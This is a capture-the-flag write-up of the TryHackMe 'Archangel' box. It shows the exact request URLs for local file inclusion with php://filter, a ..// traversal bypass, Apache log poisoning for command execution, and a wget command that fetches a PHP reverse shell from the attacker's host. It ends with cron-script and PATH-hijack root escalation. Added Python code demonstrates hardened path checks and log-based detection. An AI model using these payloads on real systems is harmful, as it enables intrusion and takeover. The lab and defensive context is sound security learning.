Archangel: TryHackMe CTF Writeup

Substing
5 min read, Oct 10, 2023


This documents my adventures through Archangel. Note that the target IP address changes a few times due to restarts.

Phase 1: recon

The first step taken was to run nmap. The results only showed us two open ports.

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9f1d2c9d6ca40e4640506fedcf1cf38c (RSA)
| 256 637327c76104256a08707a36b2f2840d (ECDSA)
|_ 256 b64ed29c3785d67653e8c4e0481cae6c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wavefire
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:BD:CD:C2:DA:BD (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first protocol analyzed was HTTP.

the web page

There was little to see there, although support@mafialive.thm hinted at a domain name. At the time I also thought it might be a username.

We put mafialive.thm into our hosts file and then began enumerating directories.

results from feroxbuster

With this we found our first flag. It totally didn’t redirect to a Rickroll, and I most definitely did not fall for it.

the totally real flag that totally was not a Rickroll

Investigating mafialive.thm we found a new website.

the new website

We enumerated the directories here, and this time found something very useful.

directory busting

The new directory found was called test.php.

test.php

We investigated the button and noticed the new URL.

Based on this query and its result, we discovered we were in /var/www/html/development_testing.

We used a number of payloads from https://github.com/payloadbox/rfi-lfi-payload-list in order to find a way to take advantage of the ?view= part of the URL.

Recalling that PHP source sometimes can't simply be requested through the browser, since the server executes it rather than returning it, we used an alternative route to the source code: having the php://filter wrapper return the file base64-encoded.

The payload used:

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

we have accessed the base64 encoded PHP

Switching out the file being revealed, we gained access to the PHP code for the site.

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

Phase 2: exploitation

the decoded PHP for test.php

The code here only allows requests whose view value contains /var/www/html/development_testing, and rejects requests containing ../.. .

Both checks are plain string matches, so they can be bypassed by including the expected directory in the value and using ..//.. , which the server resolves to the same parent directory as ../.. but which does not match the blacklisted string.

http://mafialive.thm/test.php?view=/var/www/html/development_testing..//..//..//..//..//etc/passwd allows us to leak users.
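To make the failure of those two string checks concrete, here is an added example (mine, not the box's PHP and not from the original writeup) that reproduces the filter's logic in Python and sets a path-resolving allowlist check beside it. The WEB_ROOT constant is taken from the writeup; the function names and the candidate list are my own.

```python
import posixpath

# Directory the page's test.php expects in every request (taken from the writeup).
WEB_ROOT = "/var/www/html/development_testing"


def naive_filter_allows(view: str) -> bool:
    """Reproduction of the check described for test.php: the value must
    contain the expected directory and must not contain the literal
    string '../..'. Both are substring tests on the raw string, so they
    say nothing about which file is finally opened."""
    return WEB_ROOT in view and "../.." not in view


def hardened_filter_allows(view: str) -> bool:
    """Allowlist by resolved location rather than by string content.

    posixpath.normpath collapses '..', '.' and doubled slashes the way the
    operating system does, so '..//..' and '../..' end up identical.
    Wrapper schemes (php://, data://, ...) are rejected because they are
    not filesystem paths at all. normpath is used here so the example runs
    without touching disk; a real deployment should additionally call
    os.path.realpath on the existing file so symlinks are resolved too.
    """
    if "://" in view or "\x00" in view:
        return False
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, view))
    return resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/")


def compare(views):
    """Return (view, naive_verdict, hardened_verdict) for each candidate."""
    return [(v, naive_filter_allows(v), hardened_filter_allows(v)) for v in views]


# Constructed candidates; the first three mirror request shapes from the writeup.
CANDIDATES = [
    WEB_ROOT + "/mrrobot.php",
    WEB_ROOT + "..//..//..//..//..//etc/passwd",
    "php://filter/convert.base64-encode/resource=" + WEB_ROOT + "/test.php",
    WEB_ROOT + "/../../../../etc/passwd",
]

if __name__ == "__main__":
    for view, naive, hardened in compare(CANDIDATES):
        print(f"{'naive=ALLOW' if naive else 'naive=deny':<12} "
              f"{'hardened=ALLOW' if hardened else 'hardened=deny':<15} {view}")
```

The naive function lets the second and third candidates through because neither contains the exact string it blacklists, while the hardened one rejects them because it decides on where the path actually lands, not on what it looks like.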

Log files were found to be readable through the same include, which pointed to a log poisoning vulnerability. In short, we inject our own code into a log file, and when the vulnerable page includes that log file the code is executed.

showing the log file
injecting php

http://mafialive.thm/test.php?view=/var/www/html/development_testing..//..//..//..//..//var/log/apache2/access.log&cmd=ls

testing rce
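As an added, defender-side example that is not part of the original writeup, the following script scans constructed Apache access-log lines for the request shapes seen in this section: the php://filter wrapper, traversal sequences such as ..//, includes of files under /var/log, and a PHP open tag landing in the User-Agent field, which is what a poisoning attempt looks like from the server's side. The sample lines, indicator names and function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format. They imitate the request
# shapes discussed in this writeup; they are not the box's real log.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /test.php?view=/var/www/html/development_testing/mrrobot.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:07 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:15 +0000] "GET /test.php?view=/var/www/html/development_testing..//..//..//..//..//etc/passwd HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:12:00:31 +0000] "GET / HTTP/1.1" 200 3010 "-" "<?php echo 'poisoned'; ?>"
10.0.0.5 - - [10/Oct/2023:12:00:40 +0000] "GET /test.php?view=/var/www/html/development_testing..//..//..//..//..//var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:12:01:02 +0000] "GET /index.html HTTP/1.1" 200 3010 "-" "curl/7.88.1"
"""

# Fields of the combined log format that matter here.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicator name -> pattern, checked against the URL-decoded request, referer and UA,
# so percent-encoded traversal (..%2F) is caught as well as the plain form.
INDICATORS = [
    ("php_wrapper", re.compile(r"php://", re.I)),
    ("traversal", re.compile(r"\.\.[\\/]")),
    ("log_include", re.compile(r"/var/log/", re.I)),
    ("php_tag", re.compile(r"<\?(?:php\b|=)", re.I)),
]


def parse_line(line: str):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Names of every indicator that fires on this entry, in INDICATORS order."""
    text = unquote(" ".join((entry["req"], entry["ref"], entry["ua"])))
    return [name for name, pat in INDICATORS if pat.search(text)]


def scan_log(text: str) -> list:
    """Return one finding per log line that triggers at least one indicator."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "indicators": hits, "request": entry["req"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], ",".join(f["indicators"]), f["request"])
```

The first and last sample lines are ordinary traffic and produce no finding; the remaining four each carry at least one indicator. The php_tag check runs over the User-Agent and Referer as well as the request line because those fields are written to the log verbatim, which is exactly the property poisoning relies on.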

I attempted to open a shell directly from the URL, but found it simpler to upload a PHP shell. For this, an HTTP server must host the shell.

http://mafialive.thm/test.php?view=/var/www/html/development_testing..//..//..//..//..//var/log/apache2/access.log&cmd=wget http://10.10.189.242:8000/rev.php

connection received

Looking at our listener, we saw a connection when we navigated to the web shell: http://mafialive.thm/rev.php

access granted

Phase 3: escalation

The first step taken was enumerating the local system. This was done with linpeas.

highlighted vulnerability

What we discovered here was a cron job running as archangel whose script is world-writable. After modifying that script and opening a listener, we were able to gain a shell with elevated privileges.

our modified helloworld.sh

Here we gained a shell as archangel. The next step was to look for a way to get root access.

We discovered an executable with the SUID bit set, which we can run, but cannot modify.

The file calls the cp command by name rather than by absolute path, so the way to root was through the PATH variable. The gist of what we did is that we created our own cp executable which spawns a shell (executes /bin/bash), then ensured that the system runs our cp instead of the real one. This is done by changing the PATH that the system uses to decide which executable to run.
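The two escalation findings above (a world-writable script run by cron, and a privileged program that invokes cp by bare name) both come down to checks an administrator can automate. The following added example, which is mine and not from the writeup or the box, models a small filesystem as a dictionary and implements both checks: a simplified owner/other writability test for cron targets, and an execvp-style PATH lookup that shows why a bare command name can be shadowed while an absolute path cannot. Every path, owner and mode in FS is constructed for illustration; the writeup only names helloworld.sh, not its directory.

```python
import posixpath

# Constructed model of part of a filesystem: path -> (owner, mode, is_dir).
# Illustrative only; this is not the real layout of the Archangel box.
FS = {
    "/bin": ("root", 0o755, True),
    "/bin/cp": ("root", 0o755, False),
    "/usr/bin": ("root", 0o755, True),
    "/opt/helloworld.sh": ("archangel", 0o777, False),  # world-writable cron target (example path)
    "/etc/cron.d/backup.sh": ("root", 0o755, False),    # correctly locked down
    "/home/archangel": ("archangel", 0o755, True),
    "/home/archangel/cp": ("archangel", 0o755, False),  # user-owned file named like a system tool
}


def writable_by(path: str, user: str, fs: dict) -> bool:
    """True when `user` can write `path` under a simplified owner/other model (groups ignored)."""
    owner, mode, _ = fs[path]
    if user == "root":
        return True
    if owner == user:
        return bool(mode & 0o200)
    return bool(mode & 0o002)


def find_writable_cron_targets(targets: list, user: str, fs: dict) -> list:
    """Cron scripts that the given unprivileged user could edit (the helloworld.sh finding)."""
    return [t for t in targets if writable_by(t, user, fs)]


def resolve_command(cmd: str, path_env: str, fs: dict):
    """execvp-style lookup: a bare name is searched left to right through PATH and the
    first executable regular file wins; a name containing '/' is used as given."""
    if "/" in cmd:
        return cmd if cmd in fs else None
    for d in path_env.split(":"):
        cand = posixpath.join(d, cmd)
        entry = fs.get(cand)
        if entry and not entry[2] and entry[1] & 0o111:
            return cand
    return None


def path_hijack_risk(cmd: str, path_env: str, fs: dict, user: str) -> dict:
    """For a command a privileged program runs, report which file PATH selects and
    whether that file is one the unprivileged user owns or can write."""
    selected = resolve_command(cmd, path_env, fs)
    if selected is None:
        return {"selected": None, "hijackable": False}
    owner = fs[selected][0]
    return {"selected": selected,
            "hijackable": owner == user or writable_by(selected, user, fs)}


if __name__ == "__main__":
    cron_targets = ["/opt/helloworld.sh", "/etc/cron.d/backup.sh"]
    print("writable cron targets:", find_writable_cron_targets(cron_targets, "www-data", FS))
    for cmd, path in [("cp", "/home/archangel:/usr/bin:/bin"), ("/bin/cp", "/home/archangel:/usr/bin:/bin")]:
        print(cmd, "with PATH", path, "->", path_hijack_risk(cmd, path, FS, "archangel"))
```

With a user-controlled PATH in front, the bare `cp` resolves to the user's file and is reported as hijackable; `/bin/cp` ignores PATH entirely, which is why SUID programs should invoke helpers by absolute path or reset PATH to a fixed value before running anything.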

the finishing move

With that, we have achieved root level access and pwned the machine!
